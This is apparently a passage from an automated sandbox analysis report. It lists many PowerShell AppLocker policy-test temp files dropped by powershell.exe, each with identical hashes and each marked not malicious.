                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwgcm0fp.h3j.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j143tiq5.m0n.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jety1rdy.dmk.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmfl2r3a.vbj.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbqvk5m2.1dt.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuwrchlv.buu.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lduxcszh.u3j.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mcxz0kcx.0b1.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk4q1udu.qjw.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkeawojq.uts.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mobcfxbt.ovi.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbglcset.204.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ni2emuco.fb4.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt2kirh4.pau.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1pk3l1y.fr5.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2ins4ra.k0j.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p5msztft.vk5.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_paowqvrw.hiw.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_peaa5wnl.jqu.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmf0whju.lol.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qftrjhft.nrs.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qvy2zkvp.0qt.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qx33wvia.pkm.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdca3g0z.4qk.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_respt2aj.ymf.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfwd1suo.3qe.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqbk55iq.5hb.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sf0xnwub.2mn.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tceyxi1l.nnu.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tj2aupba.3yh.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tn1wqc2f.nmz.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
